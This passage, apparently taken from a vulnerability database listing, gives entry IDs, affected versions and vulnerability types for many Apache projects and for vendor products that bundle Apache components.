4262| [107639] Apache NiFi 1.4.0 XML External Entity
4263| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
4264| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
4265| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
4266| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
4267| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
4268| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
4269| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
4270| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
4271| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
4272| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
4273| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
4274| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4275| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4276| [107197] Apache Xerces Jelly Parser XML File XML External Entity
4277| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
4278| [107084] Apache Struts up to 2.3.19 cross site scripting
4279| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
4280| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
4281| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
4282| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
4283| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
4284| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
4285| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
4286| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
4287| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
4288| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
4289| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
4290| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
4291| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4292| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4293| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
4294| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
4295| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
4296| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
4297| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
4298| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
4299| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
4300| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
4301| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
4302| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
4303| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
4304| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
4305| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
4306| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
4307| [105878] Apache Struts up to 2.3.24.0 privilege escalation
4308| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
4309| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
4310| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
4311| [105643] Apache Pony Mail up to 0.8b weak authentication
4312| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
4313| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
4314| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
4315| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
4316| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
4317| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
4318| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
4319| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
4320| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
4321| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
4322| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
4323| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
4324| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
4325| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
4326| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
4327| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
4328| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
4329| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
4330| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
4331| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
4332| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
4333| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
4334| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
4335| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
4336| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
4337| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
4338| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
4339| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
4340| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
4341| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
4342| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
4343| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
4344| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
4345| [103690] Apache OpenMeetings 1.0.0 sql injection
4346| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
4347| [103688] Apache OpenMeetings 1.0.0 weak encryption
4348| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
4349| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
4350| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
4351| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
4352| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
4353| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
4354| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
4355| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
4356| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
4357| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
4358| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
4359| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
4360| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
4361| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
4362| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
4363| [103352] Apache Solr Node weak authentication
4364| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
4365| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
4366| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
4367| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
4368| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
4369| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
4370| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
4371| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
4372| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
4373| [102536] Apache Ranger up to 0.6 Stored cross site scripting
4374| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
4375| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
4376| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
4377| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
4378| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
4379| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
4380| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
4381| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
4382| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
4383| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
4384| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
4385| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
4386| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
4387| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
4388| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
4389| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
4390| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
4391| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
4392| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
4393| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
4394| [99937] Apache Batik up to 1.8 privilege escalation
4395| [99936] Apache FOP up to 2.1 privilege escalation
4396| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
4397| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
4398| [99930] Apache Traffic Server up to 6.2.0 denial of service
4399| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
4400| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
4401| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
4402| [117569] Apache Hadoop up to 2.7.3 privilege escalation
4403| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
4404| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
4405| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
4406| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
4407| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
4408| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
4409| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
4410| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
4411| [99014] Apache Camel Jackson/JacksonXML privilege escalation
4412| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4413| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
4414| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4415| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
4416| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
4417| [98605] Apple macOS up to 10.12.3 Apache denial of service
4418| [98604] Apple macOS up to 10.12.3 Apache denial of service
4419| [98603] Apple macOS up to 10.12.3 Apache denial of service
4420| [98602] Apple macOS up to 10.12.3 Apache denial of service
4421| [98601] Apple macOS up to 10.12.3 Apache denial of service
4422| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
4423| [98405] Apache Hadoop up to 0.23.10 privilege escalation
4424| [98199] Apache Camel Validation XML External Entity
4425| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
4426| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
4427| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
4428| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
4429| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
4430| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
4431| [97081] Apache Tomcat HTTPS Request denial of service
4432| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
4433| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
4434| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
4435| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
4436| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
4437| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
4438| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
4439| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
4440| [95311] Apache Storm UI Daemon privilege escalation
4441| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
4442| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
4443| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
4444| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
4445| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
4446| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
4447| [94540] Apache Tika 1.9 tika-server File information disclosure
4448| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
4449| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
4450| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
4451| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
4452| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
4453| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
4454| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4455| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4456| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
4457| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
4458| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
4459| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
4460| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
4461| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
4462| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4463| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4464| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
4465| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
4466| [93532] Apache Commons Collections Library Java privilege escalation
4467| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
4468| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
4469| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
4470| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
4471| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
4472| [93098] Apache Commons FileUpload privilege escalation
4473| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
4474| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
4475| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
4476| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
4477| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
4478| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
4479| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
4480| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
4481| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
4482| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
4483| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
4484| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
4485| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
4486| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
4487| [92549] Apache Tomcat on Red Hat privilege escalation
4488| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
4489| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
4490| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
4491| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
4492| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
4493| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
4494| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
4495| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
4496| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
4497| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
4498| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
4499| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
4500| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
4501| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
4502| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
4503| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
4504| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
4505| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
| [82076] Apache Ranger up to 0.5.1 privilege escalation
| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
